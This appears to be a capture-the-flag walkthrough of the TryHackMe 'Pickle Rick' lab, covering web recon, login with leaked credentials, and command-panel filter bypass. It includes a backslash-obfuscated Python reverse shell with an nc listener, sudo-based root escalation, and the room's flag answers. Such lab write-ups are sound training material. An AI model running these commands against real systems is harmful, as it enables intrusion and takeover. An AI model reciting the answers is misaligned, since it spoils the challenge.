3 minutes
THM_PickleRick_Walkthrough
Simple Walkthrough for a TryHackMe Room
Pickle Rick TryHackMe
performed by: jb-williams
Pickle Rick
To access the box add the machines IP to this https://<IP>.p.thmlabs.com
- Traveling to the sight we can start gathering information
- First it is always good to
View Page Source
to see if there are any information disclosers accidently left in the html source code. - Doing so, you can see that a comment left in the source code is reminding Rick that the user name for their account is
R1ckRul3s
- Now we scan the box with nmap to see what info we can gather.
nmap -v -sC -sV -oN nmap/initial <IP>
- Found that OpenSSH 7.2p2 on port
22
- Found that Apache httpd 2.4.18 on port
80
- While nmap was running I went to the site and just to check and see if there is anything interesting in the
robots.txt
file. - There was a single ‘word’ in that file:
Wubbalubbadubdub
- I like to use
feroxbuster
instead ofgobuster
, just preference. So I ran my normalferoxbuster
cmd, which also routes it through my web-proxyzaproxy
(similar to burp) so I can capture and reuse any requests.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -x php,php5,htm,html,html5,js,txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.24.209/
- Found a hidden
/login.php
route an began fuzzing Rick’s login with usernameR1ckRul3s
- After some time of fuzzing the password with
zaproxy
and poking around some, I got back to the/robots.txt
and was reminded aboutWubbalubbadubdub
. - I was able to login to Rick’s account with username:
R1ckRul3s
password:Wubbalubbadubdub
- Logging in brought me to
/portal.php
with the first page being aCommand Panel
. - Immediately attempted to run
ls
and say that it did list out directory contents:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
- Trying to
cat
out any file responds with that command being disabled. - A go to for me, seems a little long, but usually works for me is this bash syntax: use absolute path if necessary, default would be files in current working directory
while read line; do echo $line; done < $FILE
ex:
while read line; do echo $line; done < Sup3rS3cretPickl3Ingred.txt
- Did that with both
Sup3rS3cretPickl3Ingred.txt
(our answer for question one) andclue.txt
(clue to next ingredient)
- Tried some different commands and found that this slightly obfuscated python3 reverse shell was able to work. To get the shell I ran: local machine
nc -lnvp 4444
in the command panel I pasted this(make sure you change you your ip and port)
p\ython3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<IP>",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
- Once I had a shell on the machine I ran
ls /home
to see any users’ home directories. - Noticed Rick’s so I ran
ls -la /home/rick
and sawsecond ingredients
. - Seeing the output that way let me know that it was a file with a space in the name so to cat it out I ran:
cat /home/rick/second\ ingredients
- And that got us the answer to the second question.
- Gathering more information about the system I happened to run
sudo -l
and saw that userwww-data
(which was the user I was on as) could run any sudo command withought a password, so I ran:
sudo su
- And was given
root
access.
- I traversed over to the
/root
dir and listed it’s contents and saw3rd.txt
- After using
cat
to display3rd.txt
we got the answer for the last question.
What is the first ingredient Rick needs?
- Answer:
mr. meeseek hair
Whats the second ingredient Rick needs?
- Answer:
1 jerry tear
Whats the final ingredient Rick needs?
- Answer:
fleep juice
written and performed by jb-williams - github
linux pentest nmap feroxbuster scanning bash python tryhackme picklerick walkthrough
586 Words
2023-04-13 10:04